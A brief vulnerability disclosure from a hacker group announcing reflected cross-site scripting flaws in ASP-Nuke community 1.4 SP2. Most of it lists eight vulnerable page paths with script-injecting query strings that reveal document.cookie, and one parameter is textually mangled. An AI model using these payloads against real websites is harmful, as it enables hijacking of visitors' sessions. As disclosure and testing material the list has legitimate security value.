ASP-Nuke community version 1.4 SP2 suffers from multiple cross site scripting flaws. Earlier versions also may be affected.
36cb63a9d0d658055ccebc69af687636d7ed29a68857d40f431d925d633f3b17
I MurderSkillz from g00ns.net have found xss vulnerabilities in ASP-Nuke community v1.4 SP2 (and possibly other versions).
Shouts to z3r0, neX, uid0 (exploitercode.com), Zodiac, Wicked, and all the other I may have forgot..
Once again..g00ns.net fucking owns j00!
XSS in
/articles.asp
?cmd="><script>alert(document.cookie);</script>&cat=12
--------
/calender.asp
?cat="><script>alert(document.cookie);</script>&do=year&Date=01%2F03%2F2006
--------
/downloads.asp
?cat="><script>alert(document.cookie);</script>
--------
/guestbook.asp
?do='><script>alert(document.cookie);</script>
--------
/images.asp
?cat="><script>alert(document.cookie);</script>
--------
/forum/forum.asp
?forum=1§ion=1&post="><script>alert(document.cookie);</script>&page=last
-------
/profile.asp
?id=<script>alert(document.cookie);</script>
-------
/search.asp
?section=news&r="><script>alert(document.cookie);< /script>